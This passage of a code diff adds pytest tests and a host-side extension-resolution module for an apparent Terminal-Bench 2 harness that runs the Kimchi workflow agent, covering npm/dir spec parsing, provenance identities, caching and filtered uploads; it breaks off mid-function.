+    # the final `set -m && { ... }` block that launches kimchi.
+    assert f"{stage_workflows} && set -m" in command
+
+
+# --- to_agent_info() ----------------------------------------------------------
+
+
+def test_to_agent_info_before_install_reports_unresolved_extension(tmp_path: Path) -> None:
+    agent = _agent(tmp_path, workflow="tb-solver", version="1.2.3")
+    info = agent.to_agent_info()
+    assert info.name == "kimchi-workflow"
+    assert info.version == "1.2.3+tb-solver@unresolved"
+
+
+def test_to_agent_info_differs_by_workflow_name_over_one_binary(tmp_path: Path) -> None:
+    identity = "deadbeefcafe"
+    agent_a = _agent(tmp_path, workflow="tb-solver", version="1.2.3")
+    agent_a._extension_short_identity = identity
+    agent_b = _agent(tmp_path, workflow="tb-solver-v2", version="1.2.3")
+    agent_b._extension_short_identity = identity
+
+    info_a = agent_a.to_agent_info()
+    info_b = agent_b.to_agent_info()
+
+    assert info_a.version == "1.2.3+tb-solver@deadbeefcafe"
+    assert info_b.version == "1.2.3+tb-solver-v2@deadbeefcafe"
+    assert info_a.version != info_b.version
+
+
+def test_to_agent_info_matches_for_two_runs_of_the_same_workflow_name(tmp_path: Path) -> None:
+    # Accepted limitation: workflow file CONTENT isn't captured in the
+    # version string, so two runs of an edited workflow that kept its
+    # declared name are indistinguishable in result.json. Asserted
+    # deliberately, so the limitation stays documented in code rather than
+    # only in prose — see workflow_agent.py's to_agent_info() docstring.
+    identity = "deadbeefcafe"
+    agent_before_edit = _agent(tmp_path, workflow="tb-solver", version="1.2.3")
+    agent_before_edit._extension_short_identity = identity
+    agent_after_edit = _agent(tmp_path, workflow="tb-solver", version="1.2.3")
+    agent_after_edit._extension_short_identity = identity
+
+    assert agent_before_edit.to_agent_info().version == agent_after_edit.to_agent_info().version
+
+
+async def test_to_agent_info_identity_for_npm_spec_uses_the_resolved_short_identity(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    # Unlike the old passthrough design, an npm: spec's recorded identity is
+    # no longer the raw spec string — it's whatever resolve_extension_spec
+    # (here, a fake standing in for it) reports as short_identity, which for
+    # the real resolver is the RESOLVED version plus a shortened registry
+    # integrity/shasum (workflow_extension._npm_identity; exercised directly
+    # in workflow_extension_test.py, not re-tested here).
+    _write_fake_kimchi_binary_env(tmp_path, monkeypatch)
+    fake_workflows_dir = tmp_path / "fake-workflows"
+    fake_workflows_dir.mkdir()
+    (fake_workflows_dir / "tb-solver.workflow.ts").write_text("export default {}")
+    monkeypatch.setattr(workflow_agent_module, "WORKFLOWS_HOST_DIR", fake_workflows_dir)
+
+    fake_extension_dir = tmp_path / "fake-npm-ext"
+    fake_extension_dir.mkdir()
+    resolved_short_identity = "npm:@kimchi-dev/kimchi-workflows@0.1.0+abc123def456"
+    agent = _agent(
+        tmp_path,
+        extension="npm:@kimchi-dev/kimchi-workflows@0.1.0",
+        workflow="tb-solver",
+        version="1.2.3",
+        extension_resolver=lambda spec: ResolvedExtension(
+            host_dir=fake_extension_dir,
+            identity="npm:@kimchi-dev/kimchi-workflows@0.1.0+sha512-abc123def456...==",
+            short_identity=resolved_short_identity,
+        ),
+    )
+    await agent.install(FakeEnvironment())
+
+    assert agent.to_agent_info().version == f"1.2.3+tb-solver@{resolved_short_identity}"
+
+
+async def test_to_agent_info_identity_for_npm_spec_differs_when_the_resolved_version_differs(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    # The reproducibility problem the old passthrough design had with an
+    # unpinned spec — two runs recording the identical spec string even when
+    # pi resolved different code for each — does not carry over to host
+    # resolution: the adapter now genuinely learns the resolved version each
+    # time, so two resolves that land on different versions (e.g. a floating
+    # dist-tag moving between job runs) DO get different recorded identities.
+    _write_fake_kimchi_binary_env(tmp_path, monkeypatch)
+    fake_workflows_dir = tmp_path / "fake-workflows"
+    fake_workflows_dir.mkdir()
+    (fake_workflows_dir / "tb-solver.workflow.ts").write_text("export default {}")
+    monkeypatch.setattr(workflow_agent_module, "WORKFLOWS_HOST_DIR", fake_workflows_dir)
+
+    fake_extension_dir = tmp_path / "fake-npm-ext"
+    fake_extension_dir.mkdir()
+    extension = "npm:@kimchi-dev/kimchi-workflows"  # unpinned
+
+    def resolver_for(version: str):
+        return lambda spec: ResolvedExtension(
+            host_dir=fake_extension_dir,
+            identity=f"npm:@kimchi-dev/kimchi-workflows@{version}",
+            short_identity=f"npm:@kimchi-dev/kimchi-workflows@{version}",
+        )
+
+    agent_run_1 = _agent(
+        tmp_path, extension=extension, workflow="tb-solver", version="1.2.3", extension_resolver=resolver_for("0.1.0")
+    )
+    agent_run_2 = _agent(
+        tmp_path, extension=extension, workflow="tb-solver", version="1.2.3", extension_resolver=resolver_for("0.2.0")
+    )
+    await agent_run_1.install(FakeEnvironment())
+    await agent_run_2.install(FakeEnvironment())
+
+    assert agent_run_1.to_agent_info().version != agent_run_2.to_agent_info().version
+
+
+# --- env dict: no new environment variables for stock Kimchi / dir: spec ----
+
+
+@pytest.mark.parametrize(
+    "extension",
+    ["dir:/some/host/kimchi-workflows", "npm:@kimchi-dev/kimchi-workflows@0.1.0"],
+    ids=["dir", "npm"],
+)
+async def test_env_dict_has_exactly_the_same_keys_as_stock_kimchi(tmp_path: Path, extension: str) -> None:
+    # Neither form adds anything to the env dict any more: the `_extra_run_env`
+    # seam that used to exist purely for git:-family specs' non-interactive-git
+    # variables was removed along with `git:` support (nothing overrides it any
+    # more), so both remaining forms stay exactly at parity with stock Kimchi.
+    # run() never calls install()/resolve_extension_spec — _extension_paths()
+    # is a constant regardless of spec form (see the test above) — so no
+    # extension_resolver injection is needed here to keep this off the network.
+    logs_dir = tmp_path / "jobs" / "run-1" / "task__trial" / "agent"
+    stock = RecordingStockKimchi(logs_dir=logs_dir, model_name="kimchi-dev/kimi-k2.6")
+    workflow = _agent(tmp_path, extension=extension)
+
+    with pytest.raises(asyncio.CancelledError):
+        await stock.run("hello", object(), AgentContext())
+    with pytest.raises(asyncio.CancelledError):
+        await workflow.run("hello", object(), AgentContext())
+
+    assert set(workflow.agent_envs[0].keys()) == set(stock.agent_envs[0].keys())
+
+
+# --- prompt template applied exactly once ------------------------------------
+
+
+async def test_prompt_template_applied_exactly_once(tmp_path: Path) -> None:
+    template_path = tmp_path / "template.j2"
+    template_path.write_text("TASK: {{ instruction }}")
+    agent = _agent(tmp_path, prompt_template_path=template_path)
+
+    with pytest.raises(asyncio.CancelledError):
+        await agent.run("hello", object(), AgentContext())
+
+    command = agent.agent_commands[0]
+    assert "TASK: hello" in command
+    assert "TASK: TASK: hello" not in command
+
+
+# --- install(): dir: (host-resolved, uploaded) --------------------------------
+
+
+async def test_install_uploads_extension_and_staged_workflow_sources(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    _write_fake_kimchi_binary_env(tmp_path, monkeypatch)
+
+    fake_extension_dir = tmp_path / "fake-ext"
+    fake_extension_dir.mkdir()
+    fake_workflows_dir = tmp_path / "fake-workflows"
+    fake_workflows_dir.mkdir()
+    (fake_workflows_dir / "tb-solver.workflow.ts").write_text("export default {}")
+    monkeypatch.setattr(workflow_agent_module, "WORKFLOWS_HOST_DIR", fake_workflows_dir)
+
+    resolver_calls = []
+
+    def fake_resolver(spec):
+        resolver_calls.append(spec)
+        return ResolvedExtension(
+            host_dir=fake_extension_dir,
+            identity="deadbeefcafebabedeadbeefcafebabedead1234",
+            short_identity="deadbeefcafe",
+        )
+
+    agent = _agent(tmp_path, extension_resolver=fake_resolver)
+    environment = FakeEnvironment()
+
+    await agent.install(environment)
+
+    assert len(resolver_calls) == 1
+    # to_agent_info() embeds the SHORT identity; the full sha stays on the
+    # ResolvedExtension. A dir: identity does not truncate like a sha does
+    # (see ResolvedExtension's docstring), which is why these are two fields.
+    assert agent._extension_short_identity == "deadbeefcafe"
+    assert (fake_extension_dir, CONTAINER_EXTENSION_DIR) in environment.uploaded_dirs
+    # The workflows upload is a FILTERED copy (see the toolchain test below),
+    # so its source is a staging directory, not workflows/ itself. What has to
+    # hold is that something landed at the staging target.
+    assert CONTAINER_WORKFLOWS_STAGE_DIR in [target for _, target in environment.uploaded_dirs]
+
+
+async def test_install_fails_loudly_when_no_workflow_ts_files_exist(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    _write_fake_kimchi_binary_env(tmp_path, monkeypatch)
+
+    empty_workflows_dir = tmp_path / "empty-workflows"
+    empty_workflows_dir.mkdir()
+    monkeypatch.setattr(workflow_agent_module, "WORKFLOWS_HOST_DIR", empty_workflows_dir)
+
+    fake_extension_dir = tmp_path / "fake-ext"
+    fake_extension_dir.mkdir()
+
+    agent = _agent(
+        tmp_path,
+        extension_resolver=lambda spec: ResolvedExtension(
+            host_dir=fake_extension_dir, identity="a" * 40, short_identity="a" * 12
+        ),
+    )
+
+    with pytest.raises(RuntimeError, match=r"\*\.workflow\.ts"):
+        await agent.install(FakeEnvironment())
+
+
+async def test_install_does_not_count_a_workflow_file_that_the_upload_filter_strips(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    # `workflows/node_modules/@kimchi-dev/kimchi-workflows` really does ship a
+    # `create.workflow.ts`, and WORKFLOWS_UPLOAD_IGNORE strips `node_modules`
+    # from the upload — so a *.workflow.ts found there is proof of nothing. A
+    # guard that scanned the source tree recursively would accept it and let a
+    # workflow-less directory reach a trial; scanning the staged copy cannot.
+    #
+    # Addressed by PATH here because that is the form with no second line of
+    # defence: a name would still fail the top-level check afterwards.
+    _write_fake_kimchi_binary_env(tmp_path, monkeypatch)
+
+    workflows_dir = tmp_path / "workflows"
+    buried = workflows_dir / "node_modules" / "@kimchi-dev" / "kimchi-workflows" / "src" / "host" / "builtin"
+    buried.mkdir(parents=True)
+    (buried / "create.workflow.ts").write_text("export default {}\n")
+    monkeypatch.setattr(workflow_agent_module, "WORKFLOWS_HOST_DIR", workflows_dir)
+
+    fake_extension_dir = tmp_path / "fake-ext"
+    fake_extension_dir.mkdir()
+    agent = _agent(
+        tmp_path,
+        workflow=f"{PROJECT_WORKFLOWS_DIR}/node_modules/@kimchi-dev/kimchi-workflows/src/host/builtin/create.workflow.ts",
+        extension_resolver=lambda spec: ResolvedExtension(
+            host_dir=fake_extension_dir, identity="a" * 40, short_identity="a" * 12
+        ),
+    )
+
+    with pytest.raises(RuntimeError, match=r"\*\.workflow\.ts"):
+        await agent.install(FakeEnvironment())
+
+
+async def test_install_rejects_a_nested_only_layout_when_the_workflow_is_addressed_by_name(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    # `discoverWorkflows` does a non-recursive readdir, so a name can only ever
+    # resolve against the TOP level. A tree whose only *.workflow.ts files are
+    # nested is therefore unusable for `workflow=<declared name>` — and the
+    # recursive upload copying them anyway is exactly what makes that
+    # unusability silent until the trial. Catch it at install instead.
+    _write_fake_kimchi_binary_env(tmp_path, monkeypatch)
+
+    workflows_dir = tmp_path / "workflows"
+    (workflows_dir / "nested").mkdir(parents=True)
+    (workflows_dir / "nested" / "ferment-oneshot.workflow.ts").write_text("export default {}\n")
+    monkeypatch.setattr(workflow_agent_module, "WORKFLOWS_HOST_DIR", workflows_dir)
+
+    fake_extension_dir = tmp_path / "fake-ext"
+    fake_extension_dir.mkdir()
+    agent = _agent(
+        tmp_path,
+        workflow="ferment-oneshot",
+        extension_resolver=lambda spec: ResolvedExtension(
+            host_dir=fake_extension_dir, identity="a" * 40, short_identity="a" * 12
+        ),
+    )
+
+    with pytest.raises(RuntimeError, match="non-recursive"):
+        await agent.install(FakeEnvironment())
+
+
+async def test_install_accepts_a_nested_layout_when_the_workflow_is_addressed_by_path(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    # The other half of that guard: `resolveWorkflow` tries an explicit `.ts`
+    # path against the project root BEFORE any name lookup, and that route
+    # reaches a nested file fine. Rejecting this layout — which a purely
+    # top-level check would — would be a false install failure for a
+    # configuration that runs correctly.
+    _write_fake_kimchi_binary_env(tmp_path, monkeypatch)
+
+    workflows_dir = tmp_path / "workflows"
+    (workflows_dir / "nested").mkdir(parents=True)
+    (workflows_dir / "nested" / "ferment-oneshot.workflow.ts").write_text("export default {}\n")
+    monkeypatch.setattr(workflow_agent_module, "WORKFLOWS_HOST_DIR", workflows_dir)
+
+    fake_extension_dir = tmp_path / "fake-ext"
+    fake_extension_dir.mkdir()
+    agent = _agent(
+        tmp_path,
+        workflow=f"{PROJECT_WORKFLOWS_DIR}/nested/ferment-oneshot.workflow.ts",
+        extension_resolver=lambda spec: ResolvedExtension(
+            host_dir=fake_extension_dir, identity="a" * 40, short_identity="a" * 12
+        ),
+    )
+
+    class SnapshottingEnvironment(FakeEnvironment):
+        def __init__(self) -> None:
+            super().__init__()
+            self.staged_files: set[str] = set()
+
+        async def upload_dir(self, source_dir: Path | str, target_dir: str) -> None:
+            await super().upload_dir(source_dir, target_dir)
+            if target_dir == CONTAINER_WORKFLOWS_STAGE_DIR:
+                root = Path(source_dir)
+                self.staged_files = {p.relative_to(root).as_posix() for p in root.rglob("*") if p.is_file()}
+
+    environment = SnapshottingEnvironment()
+    await agent.install(environment)  # must not raise
+
+    # The nested file has to actually reach the container, or the path form
+    # would resolve to nothing there — the guard passing is only half the claim.
+    assert environment.staged_files == {"nested/ferment-oneshot.workflow.ts"}
+
+
+def test_dir_spec_short_identity_is_not_a_truncated_path(tmp_path: Path) -> None:
+    # Regression: `short_identity` exists because a dir: identity does not
+    # truncate like a sha does. `dir:<abspath>@<sha>`[:12] is `dir:/Users/m` —
+    # the sha-or-"dirty" marker gone, and every checkout under one home
+    # directory rendered identically. Since dir: IS the local development
+    # path, that made exactly the runs a developer is comparing
+    # indistinguishable from each other in result.json.
+    checkout = tmp_path / "kimchi-workflows"
+    checkout.mkdir()
+
+    resolved = resolve_extension_spec(DirExtensionSpec(path=checkout))
+
+    assert resolved.short_identity.startswith("dir:kimchi-workflows@")
+    assert str(tmp_path) not in resolved.short_identity
+    # tmp_path is not a git checkout, so the honest answer is "dirty".
+    assert resolved.short_identity.endswith("@dirty")
+    assert resolved.identity == f"dir:{checkout}@dirty"
+
+
+async def test_install_does_not_upload_the_local_toolchain(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    _write_fake_kimchi_binary_env(tmp_path, monkeypatch)
+    # workflows/ is a developer's working directory as well as an upload
+    # payload. Following its README (`npm install` to typecheck) creates a
+    # ~72MB node_modules containing a symlink pointing OUT of the repo at a
+    # sibling checkout — and an unfiltered upload put all of it into every task
+    # container, on every trial. The container resolves nothing from disk
+    # beside a .workflow.ts: the extension loads them through jiti with
+    # `typebox` and `@kimchi-dev/kimchi-workflows` served from virtual modules.
+    workflows_dir = tmp_path / "workflows"
+    (workflows_dir / "ferment").mkdir(parents=True)
+    (workflows_dir / "ferment-oneshot.workflow.ts").write_text("export default {}\n")
+    (workflows_dir / "ferment" / "contract.ts").write_text("export const x = 1\n")
+    (workflows_dir / "node_modules" / "typescript").mkdir(parents=True)
+    (workflows_dir / "node_modules" / "typescript" / "big.js").write_text("x\n")
+    (workflows_dir / "test").mkdir()
+    (workflows_dir / "test" / "ferment-oneshot.test.ts").write_text("// tests\n")
+    for name in ("package.json", "tsconfig.json", "vitest.config.ts"):
+        (workflows_dir / name).write_text("{}\n")
+
+    fake_extension_dir = tmp_path / "extension"
+    fake_extension_dir.mkdir()
+
+    # The staged copy lives in a TemporaryDirectory that install() removes on
+    # exit, so the contents have to be captured while the upload is happening.
+    class SnapshottingEnvironment(FakeEnvironment):
+        def __init__(self) -> None:
+            super().__init__()
+            self.staged_files: set[str] = set()
+
+        async def upload_dir(self, source_dir: Path | str, target_dir: str) -> None:
+            await super().upload_dir(source_dir, target_dir)
+            if target_dir == CONTAINER_WORKFLOWS_STAGE_DIR:
+                root = Path(source_dir)
+                self.staged_files = {p.relative_to(root).as_posix() for p in root.rglob("*") if p.is_file()}
+
+    agent = _agent(
+        tmp_path,
+        extension_resolver=lambda spec: ResolvedExtension(
+            host_dir=fake_extension_dir, identity="a" * 40, short_identity="a" * 12
+        ),
+    )
+    environment = SnapshottingEnvironment()
+
+    monkeypatch.setattr(workflow_agent_module, "WORKFLOWS_HOST_DIR", workflows_dir)
+    await agent.install(environment)
+
+    assert environment.staged_files == {"ferment-oneshot.workflow.ts", "ferment/contract.ts"}
+
+
+async def test_install_stages_workflow_sources_for_npm_spec_too(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    # The workflow-sources upload (and its toolchain filtering) is entirely
+    # independent of which extension form is in play — it must not regress
+    # for npm: specs either.
+    _write_fake_kimchi_binary_env(tmp_path, monkeypatch)
+    workflows_dir = tmp_path / "workflows"
+    workflows_dir.mkdir()
+    (workflows_dir / "tb-solver.workflow.ts").write_text("export default {}\n")
+    (workflows_dir / "node_modules").mkdir()
+    (workflows_dir / "node_modules" / "junk.js").write_text("x\n")
+    monkeypatch.setattr(workflow_agent_module, "WORKFLOWS_HOST_DIR", workflows_dir)
+
+    class SnapshottingEnvironment(FakeEnvironment):
+        def __init__(self) -> None:
+            super().__init__()
+            self.staged_files: set[str] = set()
+
+        async def upload_dir(self, source_dir: Path | str, target_dir: str) -> None:
+            await super().upload_dir(source_dir, target_dir)
+            if target_dir == CONTAINER_WORKFLOWS_STAGE_DIR:
+                root = Path(source_dir)
+                self.staged_files = {p.relative_to(root).as_posix() for p in root.rglob("*") if p.is_file()}
+
+    fake_extension_dir = tmp_path / "fake-npm-ext"
+    fake_extension_dir.mkdir()
+    agent = _agent(
+        tmp_path,
+        extension="npm:@kimchi-dev/kimchi-workflows@0.1.0",
+        extension_resolver=lambda spec: ResolvedExtension(
+            host_dir=fake_extension_dir, identity="unused", short_identity="unused"
+        ),
+    )
+    environment = SnapshottingEnvironment()
+
+    await agent.install(environment)
+
+    assert environment.staged_files == {"tb-solver.workflow.ts"}

--- a/benchmark/terminal-bench-2/src/kimchi_agent/workflow_extension.py
+++ b/benchmark/terminal-bench-2/src/kimchi_agent/workflow_extension.py
@@ -1,0 +1,458 @@
+"""Host-side handling of the ``extension`` agent kwarg for ``WorkflowAgent``.
+
+Both spec forms resolve on the host, never in the task container — those images
+carry no Node toolchain, so pi's own ``-e npm:...`` fails there with
+``Executable not found in $PATH: "npm"``.
+
+- ``npm:<pkg>[@<version>]`` — ``npm pack`` plus ``npm install --omit=dev
+  --omit=peer`` for its runtime deps (``jiti``, which the extension imports and
+  pi does not supply). Cached by ``<pkg>@<version>``, so a job resolves once.
+- ``dir:<host path>`` — a developer's checkout, fingerprinted rather than
+  installed; used to test engine changes before they are published.
+
+``resolve_extension_spec`` is injectable so tests never shell out or hit the
+network.
+"""
+
+import json
+import shlex
+import shutil
+import subprocess
+import tarfile
+import tempfile
+import uuid
+from collections.abc import Callable
+from dataclasses import dataclass
+from pathlib import Path
+
+# `npm:<pkg>[@<version>]`.
+_NPM_PREFIX = "npm:"
+
+# `git:<host>/<owner>/<repo>[@<ref>]`, pi's scp-like shorthand, and the bare
+# URL forms pi also accepts directly. NOT a spec form this adapter supports
+# (see module docstring) — listed here only so `parse_extension_spec` can
+# recognise a git-family spec and reject it with a message that explains why
+# and names the two forms that do work, rather than a generic "unrecognised
+# prefix" error that reads like a typo.
+_GIT_PREFIXES = ("git:", "https://", "http://", "ssh://", "git://")
+
+# `dir:<host path>` — this adapter's own invention for the local-development
+# path, resolved and validated by us, on the host.
+_DIR_PREFIX = "dir:"
+
+# ~/.cache/kimchi-bench/extensions/<sanitised pkg>-<version>/{package/, .install-complete.json}
+# Sibling of release.py's DEFAULT_CACHE_ROOT (~/.cache/kimchi-bench/releases),
+# same reasoning: a host-side, cross-job, cross-process cache keyed by the
+# thing that actually determines whether a re-resolve is redundant.
+DEFAULT_EXTENSIONS_CACHE_ROOT = Path.home() / ".cache" / "kimchi-bench" / "extensions"
+
+# Written into a resolved npm cache entry's directory only after `npm pack`,
+# extraction AND `npm install --omit=dev --omit=peer` have all succeeded —
+# never before. A resolve that dies partway (killed job, disk full, network
+# drop mid-`npm install`) leaves a cache directory with no marker file (or a
+# stale one from a previous *build* that never got renamed into place — see
+# _resolve_npm), and the next resolve treats that as a miss and starts over,
+# rather than uploading a half-installed extension to a container.
+_NPM_CACHE_MARKER = ".install-complete.json"
+
+
+@dataclass(frozen=True)
+class NpmExtensionSpec:
+    """``npm:<pkg>[@<version>]``. Resolved on the host by ``resolve_extension_spec``
+    (``npm pack`` + extract + ``npm install --omit=dev --omit=peer``, cached by
+    ``<pkg>@<version>``), then uploaded — the same shape of handling ``dir:``
+    already gets, not pi's own installation path. See the module docstring for
+    why passthrough (handing this to ``-e`` verbatim and letting pi resolve it
+    inside the container) does not work in a terminal-bench task container.
+    """
+
+    raw: str
+
+
+@dataclass(frozen=True)
+class DirExtensionSpec:
+    path: Path
+
+
+ExtensionSpec = NpmExtensionSpec | DirExtensionSpec
+
+
+def parse_extension_spec(raw: str) -> ExtensionSpec:
+    """Classify the ``extension`` agent kwarg into one of two forms.
+
+    ``git:`` specs and bare git URLs are rejected rather than accepted and left
+    to fail later: they cannot resolve in the container (no toolchain) and the
+    one repo they were used with is private, so the host cannot clone it either.
+
+    Raises ``ValueError`` so a malformed spec fails at ``harbor run``, not
+    ten minutes into a trial.
+    """
+    if not raw or not raw.strip():
+        raise ValueError("'extension' agent kwarg must not be empty")
+
+    if raw.startswith(_NPM_PREFIX):
+        return NpmExtensionSpec(raw=raw)
+
+    if raw.startswith(_DIR_PREFIX):
+        path_str = raw[len(_DIR_PREFIX) :]
+        if not path_str:
+            raise ValueError(f"'extension' dir: spec must not be empty, got {raw!r}")
+        return DirExtensionSpec(path=Path(path_str).expanduser())
+
+    if raw.startswith(_GIT_PREFIXES):
+        raise ValueError(
+            "'extension' no longer accepts 'git:' specs (or bare git URLs) — "
+            "resolving one needs a Node toolchain inside the task container, "
+            "which terminal-bench images do not have (the same reason 'npm:' "
+            "passthrough was removed), and the one repo this form was ever "
+            "used with (kimchi-workflows) is private, so host-side resolution "
+            "has no credentials for it either. Use 'npm:<pkg>[@<version>]' "
+            f"(host-resolved and cached) or 'dir:<host path>' instead — got {raw!r}"
+        )
+
+    raise ValueError(
+        "'extension' must be one of: 'npm:<pkg>[@<version>]' or 'dir:<host path>' "
+        f"— got {raw!r}"
+    )
+
+
+@dataclass(frozen=True)
+class ResolvedExtension:
+    """The host-side result of resolving an ``extension`` spec — both forms
+    (``npm:`` and ``dir:``) now produce one of these; ``WorkflowAgent.install()``
+    uploads ``host_dir`` verbatim to ``/installed-agent/kimchi-workflows`` for
+    either.
+
+    ``identity`` is the full, unabridged provenance:
+      - ``dir:``: ``dir:<abspath>@<sha-or-"dirty">``.
+      - ``npm:``: ``npm:<pkg>@<resolved version>+<integrity or shasum>`` when
+        the registry supplied one (npm always does for a real `npm pack`),
+        else just ``npm:<pkg>@<resolved version>`` — the pinned spec string
+        with the version filled in, if it was omitted.
+
+    ``short_identity`` is what ``WorkflowAgent.to_agent_info()`` embeds in
+    ``AgentInfo.version``. It is a SEPARATE field rather than a
+    truncation of ``identity`` because the two shapes do not truncate alike:
+    a `dir:` identity's first N characters are the head of an absolute host
+    path (see the field-level note in the original design for why that is
+    actively misleading), and an `npm:` identity's integrity string is an
+    ~88-character base64 SRI hash not worth carrying in full into a version
+    string read by humans.
+    """
+
+    host_dir: Path
+    identity: str
+    short_identity: str
+
+
+@dataclass(frozen=True)
+class NpmPackResult:
+    """What ``npm pack --json <spec>`` reports about the package it just
+    downloaded — the resolved version (filled in even when the spec omitted
+    one) plus enough to prove what was fetched."""
+
+    version: str
+    filename: str
+    shasum: str | None
+    integrity: str | None
+
+
+def _npm_pack(pack_spec: str, dest_dir: Path) -> NpmPackResult:
+    """Real ``npm pack`` implementation — the default for the ``npm_pack``
+    seam on ``resolve_extension_spec``. Never called by a test directly; tests
+    inject a fake that writes a fixture tarball instead, so the suite never
+    shells out to ``npm`` or touches the network.
+
+    ``cwd=dest_dir`` (an otherwise-empty directory under the cache root) is
+    deliberate: run from inside this repo (or the wider kimchi monorepo,
+    which has its own package.json / workspaces) and npm's workspace
+    resolution can second-guess what's being packed. A scratch directory
+    has no ambient npm project to get confused by.
+    """
+    try:
+        result = subprocess.run(
+            ["npm", "pack", pack_spec, "--json", "--pack-destination", str(dest_dir), "--no-audit", "--no-fund"],
+            capture_output=True,
+            text=True,
+            cwd=str(dest_dir),
+            timeout=120,
+        )
+    except OSError as exc:
+        raise RuntimeError(
+            f"could not run 'npm pack {pack_spec}': {exc}. Is npm installed and on $PATH on this host?"
+        ) from exc
+    if result.returncode != 0:
+        raise RuntimeError(
+            f"npm pack {pack_spec!r} failed (exit {result.returncode}): "
+            f"{(result.stderr or result.stdout).strip()}"
+        )
+    try:
+        packed = json.loads(result.stdout)[0]
+        return NpmPackResult(
+            version=packed["version"],
+            filename=packed["filename"],
+            shasum=packed.get("shasum"),
+            integrity=packed.get("integrity"),
+        )
+    except (json.JSONDecodeError, IndexError, KeyError) as exc:
+        raise RuntimeError(f"npm pack {pack_spec!r} produced unparseable --json output: {result.stdout!r}") from exc
+
+
+def _npm_install_runtime_deps(package_dir: Path) -> None:
+    """Real ``npm install --omit=dev --omit=peer`` implementation — the
+    default for the ``npm_install_runtime_deps`` seam. ``--omit=dev`` keeps
+    the extension's own test/build tooling out; ``--omit=peer`` matters
+    specifically because ``typebox`` and ``@earendil-works/pi-coding-agent``
+    are peers pi aliases to its own bundled copies — installing them anyway
+    (npm >=7's default) would be a wasted ~14 MB duplicate. What this step
+    exists for at all:
+    `jiti` (~1.7 MB) is a real (non-peer, non-dev) dependency that
+    ``src/host/load-workflow.ts`` imports directly, and pi does not supply it
+    to extensions.
+    """
+    # --ignore-scripts: this is the only extension code that runs on the host
+    # rather than in the container. Dropping it needs a deliberate decision.
+    command = ["npm", "install", "--omit=dev", "--omit=peer", "--ignore-scripts", "--no-audit", "--no-fund"]
+    try:
+        result = subprocess.run(
+            command,
+            capture_output=True,
+            text=True,
+            cwd=str(package_dir),
+            timeout=300,
+        )
+    except OSError as exc:
+        raise RuntimeError(f"could not run 'npm install' in {package_dir}: {exc}") from exc
+    if result.returncode != 0:
+        # quote the command actually run, so the message cannot drift from it
+        raise RuntimeError(
+            f"{shlex.join(command)!r} in {package_dir} failed "
+            f"(exit {result.returncode}): {(result.stderr or result.stdout).strip()}"
+        )
+
+
+def resolve_extension_spec(
+    spec: ExtensionSpec,
+    *,
+    cache_root: Path = DEFAULT_EXTENSIONS_CACHE_ROOT,
+    npm_pack: Callable[[str, Path], NpmPackResult] = _npm_pack,
+    npm_install_runtime_deps: Callable[[Path], None] = _npm_install_runtime_deps,
+) -> ResolvedExtension:
+    """Resolve either extension spec form **on the host**. The single seam
+    ``WorkflowAgent`` calls through its constructor-injectable
+    ``extension_resolver`` — a test overrides that whole callable, so it never
+    needs the ``npm_pack``/``npm_install_runtime_deps``/``cache_root`` knobs
+    below; those exist so *this module's own* tests can exercise the caching
+    and provenance logic without shelling out to ``npm`` or touching the
+    network, by injecting fakes for exactly the two operations that do.
+    """
+    if isinstance(spec, DirExtensionSpec):
+        return _resolve_dir(spec)
+    return _resolve_npm(
+        spec, cache_root=cache_root, npm_pack=npm_pack, npm_install_runtime_deps=npm_install_runtime_deps
+    )
+
+
+def _resolve_dir(spec: DirExtensionSpec) -> ResolvedExtension:
+    abspath = spec.path.resolve()
+    if not abspath.is_dir():
+        raise ValueError(f"extension dir:{spec.path} does not exist or is not a directory")
+    git_id = _git_identity(abspath)
+    # The basename, not the whole path: it is the part that actually varies
+    # between two checkouts a developer is A/B-ing, and the version string has
+    # to stay readable next to the kimchi version and the workflow name.
+    return ResolvedExtension(
+        host_dir=abspath,
+        identity=f"dir:{abspath}@{git_id}",
+        short_identity=f"dir:{abspath.name}@{git_id[:12]}",
+    )
+
+
+def _git_identity(path: Path) -> str:
+    """Best-effort ``<40-char sha>`` or ``"dirty"`` for a local checkout.
+
+    Never raises: a directory that isn't a git checkout at all (e.g. an
+    extension vendored without its ``.git``) is just always "dirty" — that is
+    the correct, honest answer, not an error condition.
+    """
+    try:
+        sha_result = subprocess.run(
+            ["git", "-C", str(path), "rev-parse", "HEAD"],
+            capture_output=True,
+            text=True,
+            timeout=10,
+        )
+        status_result = subprocess.run(
+            ["git", "-C", str(path), "status", "--porcelain"],
+            capture_output=True,
+            text=True,
+            timeout=10,
+        )
+    except (OSError, subprocess.TimeoutExpired):
+        return "dirty"
+    if sha_result.returncode != 0 or status_result.returncode != 0 or status_result.stdout.strip():
+        return "dirty"
+    return sha_result.stdout.strip()
+
+
+def _split_npm_pkg_and_version(pack_spec: str) -> tuple[str, str | None]:
+    """Split ``<pkg>[@<version>]`` (the part of an ``npm:`` spec after the
+    prefix) into ``(package_name, version_or_None)``.
+
+    Handles scoped packages (``@scope/name[@version]``) by only looking for
+    the version-separating ``@`` *after* the scope's ``/`` — a scoped name's
+    own leading ``@`` must not be mistaken for one.
+    """
+    if pack_spec.startswith("@"):
+        if "/" not in pack_spec:
+            raise ValueError(f"malformed scoped npm spec {pack_spec!r}; expected '@scope/name[@version]'")
+        at_index = pack_spec.find("@", pack_spec.index("/"))
+    else:
+        at_index = pack_spec.find("@")
+    if at_index == -1:
+        return pack_spec, None
+    return pack_spec[:at_index], pack_spec[at_index + 1 :]
+
+
+def _npm_cache_key(package_name: str, version: str) -> str:
+    # e.g. "@kimchi-dev/kimchi-workflows" + "0.0.1-0" -> "kimchi-dev-kimchi-workflows-0.0.1-0",
+    # matching the tarball-naming convention npm itself uses for scoped names.
+    sanitised = package_name.lstrip("@").replace("/", "-")
+    return f"{sanitised}-{version}"
+
+
+def _npm_identity(package_name: str, version: str, pack_result: NpmPackResult) -> tuple[str, str]:
